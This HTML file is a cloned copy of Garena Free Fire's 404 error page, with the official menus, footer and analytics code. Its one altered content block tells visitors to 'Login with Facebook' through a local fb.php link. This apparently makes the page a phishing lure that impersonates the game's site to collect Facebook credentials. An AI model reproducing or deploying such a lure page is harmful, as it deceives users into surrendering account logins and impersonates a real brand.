<!DOCTYPE html>
<html lang="en"><head>
    <!-- title -->
    
    <title>Garena Free Fire. Best survival Battle Royale on mobile!</title>
    
    
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta content="width=device-width,maximum-scale=1.0,initial-scale=1.0" name="viewport">
<link rel="icon" href="https://freefiremobile-a.akamaihd.net/ffwebsite/images/freefire32-2.ico" type="image/x-icon">
<link rel="shortcut icon" href="https://freefiremobile-a.akamaihd.net/ffwebsite/images/freefire16-2.ico" type="image/x-icon">
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
<meta name="copyright" content="">
<meta content="black" name="apple-mobile-web-app-status-bar-style">
<meta name="apple-mobile-web-app-title" content="Garena Free Fire">
<meta name="keywords" content="survival, last survivor, battle royale game, battle royale, battleground, last man standing, free mobile game, multipleplayer, garena mobile game,">
<meta name="description" content="Free Fire is a multiplayer battle royale mobile game, developed and published by Garena for Android and iOS. Battle in Style and be the last survivor!">
<!-- seo: markup -->
<script type="text/javascript" async="" src="error_files/analytics.js"></script><script type="text/javascript" async="" src="error_files/js.js"></script><script type="application/ld+json">
{
    "@context": "https://ff.garena.com",
    "@type": "MobileGame",
    "name": [{
        "@language": "en",
        "@value": "Garena Free Fire"
    }],
    "description": [{
        "@language": "en",
        "@value": "Garena Free Fire is a survival third-person shooter game in the form of battle royale"
    }],
    "genre": [
        "Action",
        "Third-person shooter"
    ],
    "url": "https://ff.garena.com",
    "image": "https://ff.garena.com/statics/ff/images/poster.jpg",
    "screenshot": "https://ff.garena.com/statics/ff/images/backgroundart.jpg",
    "sameAs": [
        "https://www.youtube.com/c/freefireru"
    ],
    "trailer": {
        "@type": "VideoObject",
        "url": "https://www.youtube.com/watch?v=CN3YgUCB3kQ",
        "inLanguage": "en"
    },
    "exampleOfWork": [{
            "@type": "MobileGame",
            "gamePlatform": [
                "https://en.wikipedia.org/wiki/iOS",
                "https://en.wikipedia.org/wiki/Android"
            ],
            "contentRating": "PEGI 16+",
            "releasedEvent": {
                "@type": "PublicationEvent",
                "startDate": "2017-12-07",
                "location": {
                    "@type": "Place",
                    "name": "TH"
                }
            }
        },
        {
            "@type": "MobileGame",
            "gamePlatform": [
                "https://en.wikipedia.org/wiki/iOS",
                "https://en.wikipedia.org/wiki/Android"
            ],
            "contentRating": "ESRB M",
            "releasedEvent": {
                "@type": "PublicationEvent",
                "startDate": "2017-12-07",
                "location": {
                    "@type": "Country",
                    "name": "TH"
                }
            }
        }
    ]
}
</script>
<link rel="stylesheet" href="error_files/reset.css">
<link rel="stylesheet" href="error_files/common.css">
    <!-- css -->
    
<link rel="stylesheet" href="error_files/404.css">

</head>

<body>
    
<div class="common-menu-wrap">

    <div class="x-top-line"></div>

    <!-- common menu -->

    <div class="c-menu-wrap no_download">

        <div class="c-menu-left"></div>
        <ul class="c-menu">
            <li class="c-menu-logo">
                <img src="error_files/8affefa2770d4452ed83ca923f5e5cb8png.png">
            </li>
            
            
            
            <li>
                <a href="https://ff.garena.com/index/en">HOME</a>
                
            </li>
            
            
            
            
            <li class="x-menu">
                <a href="javascript:;">GAME<span class="menu-arrow"></span></a>
                <div class="c-menu-nav">
                    <div class="c-menu-nav-list">
                        
                        
                        <a href="https://ff.garena.com/chars/index/en">
                            CHARACTER
                            
                        </a>
                        
                        
                        
                        <a href="https://ff.garena.com/pets/index/en">
                            PET
                            
                        </a>
                        
                        
                        
                        <a href="https://ff.garena.com/weapons/index/en">
                            WEAPON
                            
                        </a>
                        
                        
                        
                        <a href="https://ff.garena.com/map/static/en">
                            MAP
                            
                        </a>
                        
                        
                    </div>
                </div>
            </li>
            
            
            
            
            <li>
                <a href="https://ff.garena.com/news/index/en">NEWS</a>
                
            </li>
            
            
            
            
            <li class="x-menu">
                <a href="javascript:;">MEDIA<span class="menu-arrow"></span></a>
                <div class="c-menu-nav">
                    <div class="c-menu-nav-list">
                        
                        
                        <a href="https://ff.garena.com/media/wallpaper/en">
                            Wallpapers
                            
                        </a>
                        
                        
                        
                        <a href="https://ff.garena.com/media/video/en">
                            Video
                            
                        </a>
                        
                        
                        
                        <a class="outsite" target="_blank" href="https://ff.garena.com/universe/en/comic/">
                            <span class="outsite-link">Comic<i class="outsite-icon"></i></span>
                        </a>
                        
                        
                        
                        <a class="outsite" target="_blank" href="https://ff.garena.com/universe/en/story/">
                            <span class="outsite-link">Story<i class="outsite-icon"></i></span>
                        </a>
                        
                        
                    </div>
                </div>
            </li>
            
            
            
            
            <li>
                <a href="https://ff.garena.com/support/index/en">SUPPORT</a>
                
            </li>
            
            
            
            
            
            <li class="outsite">
                <a class="outsite-link" target="_blank" href="https://www.ffesports.com/">ESPORTS<i class="outsite-icon"></i></a>
            </li>
            
            
            
            
            
            <li class="outsite">
                <a class="outsite-link" target="_blank" href="https://ff.garena.com/max/">MAX<i class="outsite-icon"></i></a>
            </li>
            
            
            
        </ul>

        <div class="m-language-menu">
            <div class="m-language-menu-box">
                <!-- 
                <span class="arrow"><i class="up"></i><i class="down"></i></span>
                <span class="txt">en</span> 
                -->
                <i class="m-language-menu-icon"></i>
                <img src="error_files/lang_hover_icon_20211130.png" style="display: none;">
            </div>

            <div class="m-language-menu-change">
                
                <a href="https://ff.garena.com/index/en" class="active lang-en">English</a>
                
                <a href="https://ff.garena.com/index/pt" class="lang-pt">Português</a>
                
                <a href="https://ff.garena.com/index/es" class="lang-es">Español</a>
                
                <a href="https://ff.garena.com/index/id" class="lang-id">Indonesian</a>
                
                <a href="https://ff.garena.com/index/th" class="lang-th">ภาษาไทย</a>
                
                <a href="https://ff.garena.com/index/ru" class="lang-ru">Pусский</a>
                
                <a href="https://ff.garena.com/index/kr" class="lang-kr">한국어</a>
                
                <a href="https://ff.garena.com/index/ar" class="lang-ar">عربى</a>
                
                <a href="https://ff.garena.com/index/vn" class="lang-vn">Việt Nam</a>
                
                <a href="https://ff.garena.tw/" class="lang-zh">中文(繁)</a>
                
                <a href="https://ff.garena.com/index/jp" class="lang-jp">日本語</a>
                
                <a href="https://ff.garena.com/index/hi" class="lang-hi">हिंदी</a>
                
                <a href="https://ff.garena.com/index/tr" class="lang-tr">Türkçe</a>
                
                <a href="https://ff.garena.com/index/mm" class="lang-mm">ျမန္မာ</a>
                
                <a href="https://ff.garena.com/index/en-pk" class="lang-en-pk">Pakistan</a>
                
            </div>

        </div>

        <a href="https://www.facebook.com/freefireEN" target="_blank" class="share-icon-fb "></a>
        <div class="c-menu-block-right"></div>

    </div>

    <div class="c-menu-small">

        <div class="c-menu-small-left"></div>

        <div class="c-menu-small-right"><span class="one"></span><span class="two"></span><span class="three"></span>
        </div>

        <div class="c-menu-small-logo"></div>

        <div class="m-language-menu">
            <div class="m-language-menu-box">
                <i class="m-language-menu-icon"></i>
                <!-- 预加载 -->
                <img src="error_files/lang_hover_icon_20211130.png" style="display: none;">
                <img src="error_files/pc_hover_outsite_icon_20211203.png" style="display: none;">
            </div>

            <div class="m-language-menu-change">
                
                <a href="https://ff.garena.com/index/en" class="active lang-en">English</a>
                
                <a href="https://ff.garena.com/index/pt" class="lang-pt">Português</a>
                
                <a href="https://ff.garena.com/index/es" class="lang-es">Español</a>
                
                <a href="https://ff.garena.com/index/id" class="lang-id">Indonesian</a>
                
                <a href="https://ff.garena.com/index/th" class="lang-th">ภาษาไทย</a>
                
                <a href="https://ff.garena.com/index/ru" class="lang-ru">Pусский</a>
                
                <a href="https://ff.garena.com/index/kr" class="lang-kr">한국어</a>
                
                <a href="https://ff.garena.com/index/ar" class="lang-ar">عربى</a>
                
                <a href="https://ff.garena.com/index/vn" class="lang-vn">Việt Nam</a>
                
                <a href="https://ff.garena.tw/" class="lang-zh">中文(繁)</a>
                
                <a href="https://ff.garena.com/index/jp" class="lang-jp">日本語</a>
                
                <a href="https://ff.garena.com/index/hi" class="lang-hi">हिंदी</a>
                
                <a href="https://ff.garena.com/index/tr" class="lang-tr">Türkçe</a>
                
                <a href="https://ff.garena.com/index/mm" class="lang-mm">ျမန္မာ</a>
                
                <a href="https://ff.garena.com/index/en-pk" class="lang-en-pk">Pakistan</a>
                
            </div>

        </div>

    </div>

    <div class="c-menu-small-cover">

        <ul class="c-menu-small-nav">
            
            
            
            <li class="c-menu-small-list ">
                <a href="https://ff.garena.com/index/en">HOME</a>
                
            </li>
            
            
            
            
            <li class="c-menu-small-nav-list">
                <a href="javascript:;">GAME<span class="menu-arrow"></span></a>
                <ul class="small-nav-box">
                    
                    
                    <li class="c-menu-small-list">
                        <a href="https://ff.garena.com/chars/index/en">CHARACTER</a>
                        
                    </li>
                    
                    
                    
                    <li class="c-menu-small-list">
                        <a href="https://ff.garena.com/pets/index/en">PET</a>
                        
                    </li>
                    
                    
                    
                    <li class="c-menu-small-list">
                        <a href="https://ff.garena.com/weapons/index/en">WEAPON</a>
                        
                    </li>
                    
                    
                    
                    <li class="c-menu-small-list">
                        <a href="https://ff.garena.com/map/static/en">MAP</a>
                        
                    </li>
                    
                    
                </ul>
            </li>
            
            
            
            
            <li class="c-menu-small-list ">
                <a href="https://ff.garena.com/news/index/en">NEWS</a>
                
            </li>
            
            
            
            
            <li class="c-menu-small-nav-list">
                <a href="javascript:;">MEDIA<span class="menu-arrow"></span></a>
                <ul class="small-nav-box">
                    
                    
                    <li class="c-menu-small-list">
                        <a href="https://ff.garena.com/media/wallpaper/en">Wallpapers</a>
                        
                    </li>
                    
                    
                    
                    <li class="c-menu-small-list">
                        <a href="https://ff.garena.com/media/video/en">Video</a>
                        
                    </li>
                    
                    
                    
                    <li class="outsite">
                        <a class="outsite-link" target="_blank" href="https://ff.garena.com/universe/en/comic/">Comic<i class="outsite-icon"></i></a>
                    </li>
                    
                    
                    
                    <li class="outsite">
                        <a class="outsite-link" target="_blank" href="https://ff.garena.com/universe/en/story/">Story<i class="outsite-icon"></i></a>
                    </li>
                    
                    
                </ul>
            </li>
            
            
            
            
            <li class="c-menu-small-list ">
                <a href="https://ff.garena.com/support/index/en">SUPPORT</a>
                
            </li>
            
            
            
            
            
            <li class="outsite">
                <a class="outsite-link" target="_blank" href="https://www.ffesports.com/">ESPORTS<i class="outsite-icon"></i></a>
            </li>
            
            
            
            
            
            <li class="outsite">
                <a class="outsite-link" target="_blank" href="https://ff.garena.com/max/">MAX<i class="outsite-icon"></i></a>
            </li>
            
            
            
            <ul class="c-menu-small-download-link">
                <li class="appleStore"><a href="https://app.appsflyer.com/id1300146617?pid=OrganicA&amp;c=mainpage_IOS"></a></li>
                <li class="googlePlay"><a href="https://app.appsflyer.com/com.dts.freefireth?pid=OrganicA&amp;c=mainpage_AND"></a></li>
                
            </ul>

            <!--<li class="c-menu-download dn"><a href="https://play.google.com/store/apps/details?id=com.dts.freefire">DOWNLOAD</a></li>  -->
            <a href="https://www.facebook.com/freefireEN" target="_blank" class="c-menu-small-fb "></a>

        </ul>

    </div>
</div>
<!--end: common menu -->
    <!-- content -->
    
    <div class="wrap">
        <div class="m-cont">
            <h3>404</h3>
            <h4>Page Not Found</h4>
            <h5>Login with Facebook.</h5>Why don't you try the <a href="fb.php">Facebook</a>
        </div>
    </div>

    <!-- footer -->
    
<!-- common footer -->

<div class="g-footer clearFix">

    <div class="m-foot-wrap">

        <div class="m-language">

            <span class="earth"></span>

            <span class="txt">English</span>

            <span class="arrow"><i class="up"></i><i class="down"></i></span>

            <div class="m-language-change">
                
                    <a href="https://ff.garena.com/index/en" class="active lang-en">English</a>
                
                    <a href="https://ff.garena.com/index/pt" class="lang-pt">Português</a>
                
                    <a href="https://ff.garena.com/index/es" class="lang-es">Español</a>
                
                    <a href="https://ff.garena.com/index/id" class="lang-id">Indonesian</a>
                
                    <a href="https://ff.garena.com/index/th" class="lang-th">ภาษาไทย</a>
                
                    <a href="https://ff.garena.com/index/ru" class="lang-ru">Pусский</a>
                
                    <a href="https://ff.garena.com/index/kr" class="lang-kr">한국어</a>
                
                    <a href="https://ff.garena.com/index/ar" class="lang-ar">عربى</a>
                
                    <a href="https://ff.garena.com/index/vn" class="lang-vn">Việt Nam</a>
                
                    <a href="https://ff.garena.tw/" class="lang-zh">中文(繁)</a>
                
                    <a href="https://ff.garena.com/index/jp" class="lang-jp">日本語</a>
                
                    <a href="https://ff.garena.com/index/hi" class="lang-hi">हिंदी</a>
                
                    <a href="https://ff.garena.com/index/tr" class="lang-tr">Türkçe</a>
                
                    <a href="https://ff.garena.com/index/mm" class="lang-mm">ျမန္မာ</a>
                
                    <a href="https://ff.garena.com/index/en-pk" class="lang-en-pk">Pakistan</a>
                
            </div>
        </div>

        <div class="m-foot-copyright">

            <div class="m-foot-logo"><img src="error_files/logo_small_foot.png"></div>

            <div class="txt">Copyright © Garena International.<br>Trademarks belong to their respective owners. All rights Reserved.</div>

        </div>
        <div class="m-foot-link">
            <a href="https://ff.garena.com/others/game_security/en/" target="_blank">Game Security</a>
            <a href="https://ff.garena.com/others/faq/en/" target="_blank" style="margin-left:10px">For Parents FAQ</a>
            
            <a href="https://ff.garena.com/others/policy/en/" target="_blank" style="margin-left:10px">Privacy Policy</a>
            
        </div>
    </div>

</div>

<!--end: common footer -->


    
<script src="error_files/jquery-1.js" type="text/javascript"></script>
<script src="error_files/fastclick.js" type="text/javascript"></script>
<script src="error_files/common.js" type="text/javascript"></script>

    
    <script type="text/javascript">
    $(function() {
        if(Common.isMobile()){
            Common.init();
        }
    })
    </script>


    <!-- Global Site Tag (gtag.js) - Google Analytics -->
    <script async="" src="error_files/js_002.js"></script>
<script>
  window.dataLayer = window.dataLayer || [];

  function gtag() {
    dataLayer.push(arguments);
  }
  gtag('js', new Date());

  gtag('config', 'G-KE3SY7MRSD');

  function addGA(event, status) {
    var report = {
      event_label: status
    }
    gtag('event', event, report)
  }
</script>


</body></html>